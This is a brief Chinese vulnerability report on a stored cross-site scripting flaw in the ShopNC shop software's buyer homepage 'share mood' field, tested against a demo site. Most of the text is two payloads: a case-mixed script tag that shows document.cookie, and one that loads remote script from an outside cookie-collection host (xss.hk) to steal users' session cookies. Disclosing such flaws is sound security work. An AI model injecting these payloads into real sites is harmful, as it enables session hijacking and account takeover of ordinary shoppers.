...">
shopnc存储型xss漏洞
shopnc版本测试http://www.shopnctest.com/c2c/2013/demo/
shopnc用户个人主页处存在存储型XSS,可以获取用户敏感cookie信息。
在买家首页,分享心情处
测试代码为:"><img src /><scriPt >alert(document.cookie)</scripT>// cookie收信平台 "><img src /><scriPt src=http://xss.hk/ytcXRW?1396447777>alert(document.cookie)</scripT>/
如图
如上描述